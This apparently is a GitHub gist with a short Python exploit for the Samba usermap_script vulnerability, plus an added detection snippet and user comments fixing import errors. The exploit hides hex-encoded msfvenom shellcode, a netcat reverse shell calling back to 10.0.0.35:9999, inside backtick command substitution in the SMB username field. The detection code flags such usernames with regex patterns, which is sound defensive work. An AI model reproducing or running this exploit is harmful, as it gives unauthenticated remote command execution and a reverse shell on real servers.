#!/usr/bin/python
from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys
# Just a python version of a very simple Samba exploit.
# It doesn't have to be pretty because the shellcode is executed
# in the username field.
# Based off this Metasploit module - https://www.exploit-db.com/exploits/16320/
# Configured SMB connection options with info from here:
# https://pythonhosted.org/pysmb/api/smb_SMBConnection.html
# Use the commandline argument as the target:
if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <HOST>\n"
    sys.exit()
# Shellcode:
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python
buf = ""
buf += "\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6b"
buf += "\x62\x67\x61\x66\x3b\x20\x6e\x63\x20\x31\x30\x2e\x30"
buf += "\x2e\x30\x2e\x33\x35\x20\x39\x39\x39\x39\x20\x30\x3c"
buf += "\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66\x20\x7c\x20"
buf += "\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70"
buf += "\x2f\x6b\x62\x67\x61\x66\x20\x32\x3e\x26\x31\x3b\x20"
buf += "\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66"
buf += "\x20"
username = "/=`nohup " + buf + "`"
password = ""
conn = SMBConnection(username, password, "SOMEBODYHACKINGYOU" , "METASPLOITABLE", use_ntlm_v2 = False)
assert conn.connect(sys.argv[1], 445)
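
A defender-side check for the pattern this script relies on: a session-setup username carrying shell command substitution. This is an added example, not part of the gist; it assumes a sensor or log pipeline already extracts (source IP, username) pairs, and the function names and sample records are constructed for illustration.

```python
import re

# Shell metacharacters that have no place in an SMB account name. A lone
# trailing "$" is deliberately absent: machine accounts end with it.
SHELL_PATTERNS = [
    ("backtick command substitution", re.compile(r"`")),
    ("$() command substitution", re.compile(r"\$\(")),
    ("command separator or pipe", re.compile(r"[;|&]")),
    ("redirection", re.compile(r"[<>]")),
    ("control character", re.compile(r"[\x00-\x1f\x7f]")),
]
# The gist's username starts with "/=" before the backticks.
PAGE_PREFIX = re.compile(r"^/=")


def username_findings(username):
    """Return the reasons a session-setup username looks like an injection attempt."""
    findings = [label for label, rx in SHELL_PATTERNS if rx.search(username)]
    if PAGE_PREFIX.search(username):
        findings.append('"/=" prefix')
    return findings


def triage(records):
    """records: iterable of (source_ip, username); return only the flagged ones."""
    return [(ip, user, f) for ip, user in records if (f := username_findings(user))]


# Constructed sample records (not captured traffic); payloads are inert placeholders.
SAMPLE = [
    ("192.0.2.10", "alice"),
    ("192.0.2.11", "CORP\\bob"),
    ("192.0.2.12", "WKSTN01$"),            # machine account, must not be flagged
    ("192.0.2.13", "carol@example.test"),
    ("192.0.2.66", "/=`nohup PLACEHOLDER`"),
    ("192.0.2.67", "x$(PLACEHOLDER)"),
]

if __name__ == "__main__":
    for ip, user, reasons in triage(SAMPLE):
        print(f"{ip} {user!r}: {', '.join(reasons)}")
```
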

ar0dd commented Mar 3, 2019

Works like a charm. Thanks.

rehamun commented Sep 4, 2019

Could you please clarify how the code is going to recognize the RHOST IP or the URL?

jeffinm commented Feb 26, 2020

Hi
I am getting this error, while running this code. Any idea why?

python samba-usermap-exploit.py

Traceback (most recent call last):
  File "samba-usermap-exploit.py", line 4, in <module>
    from smb.SMBConnection import SMBConnection
ImportError: No module named smb.SMBConnection

Anass-bekar commented Mar 17, 2020

Download mysmb.py

toddjones1984 commented Mar 20, 2020

I downloaded impacket and mysmb.py, but I'm still getting errors. Any help would be appreciated.

Traceback (most recent call last):
  File "3.0.20.py", line 3, in <module>
    from smb.SMBConnection import SMBConnection
  File "/opt/smb/impacket/impacket/smb.py", line 49, in <module>
    from pyasn1.type.univ import noValue
ImportError: No module named pyasn1.type.univ

edenbomb commented May 27, 2020

According to http://http.kali.org/kali/pool/main/p/pysmb/, when we try to install smb for python2, it fails with an error because the file is not found.
So I would like to suggest this edit:
Old:
print "\nUsage: " + sys.argv[0] + " <HOST>\n"
New:
print ("\nUsage: " + sys.argv[0] + " <HOST>\n")

and using python3 instead.

Remark:
Install command ==> sudo apt-get install -y python3-smb

CybertSys commented Jul 6, 2020

There's an encoding issue. I know what needs to happen but I'm unsure of the syntax.

username = "/=nohup " + buf + ""
TypeError: can only concatenate str (not "bytes") to str

MidnightSeer commented Jul 14, 2020

A tip, stick with python2, pip install pysmb still works...this exploit is the simplest they come.
